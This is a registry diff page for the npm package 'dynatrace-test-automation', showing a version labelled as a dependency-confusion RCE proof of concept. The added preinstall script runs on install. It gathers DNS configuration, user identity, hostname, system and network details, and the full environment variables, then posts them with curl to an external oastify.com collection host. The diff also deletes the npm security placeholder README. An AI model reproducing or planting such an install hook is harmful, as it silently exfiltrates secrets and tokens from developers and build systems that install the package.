dynatrace-test-automation 0.0.1-security → 11.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of dynatrace-test-automation might be problematic. Click here for more details.
- package/package.json +8 -3
- package/README.md +0 -5
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "dynatrace-test-automation",
|
|
3
|
-
"version": "0.0
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "11.0.0",
|
|
4
|
+
"description": "CRITICAL - RCE PoC via Dependency Confusion for Dynatrace (nepalihacker000)",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"preinstall": "(echo '[+] === Nepalese Hunter: RCE Beacon ==='; echo '[>] Timestamp: ' $(date); echo; echo '[+] --- DNS CONFIGURATION (CRITICAL PROOF) ---'; cat /etc/resolv.conf 2>/dev/null || echo 'resolv.conf not found'; echo; echo '[+] --- USER & PRIVILEGE CONTEXT ---'; id 2>/dev/null || echo 'id command not found'; echo; echo '[+] --- SYSTEM & ENVIRONMENT ---'; hostname 2>/dev/null || echo 'hostname not found'; pwd 2>/dev/null || echo 'pwd not found'; uname -a 2>/dev/null || echo 'uname not found'; echo; echo '[+] --- NETWORK CONFIGURATION ---'; (ifconfig 2>/dev/null || ip -o a 2>/dev/null || echo 'No network tools (ifconfig/ip) found.'); echo; echo '[+] --- FULL ENVIRONMENT VARIABLES ---'; env 2>/dev/null || echo 'env command not found') | curl -X POST --data-binary @- http://rni91g2j2s3k2kv1y3wmcx2rvi1hp7dw.oastify.com/DYNATRACE-RCE-FROM-$(hostname)"
|
|
8
|
+
},
|
|
9
|
+
"author": "nepalihacker000 (Bugcrowd P1)",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=dynatrace-test-automation for more information.
|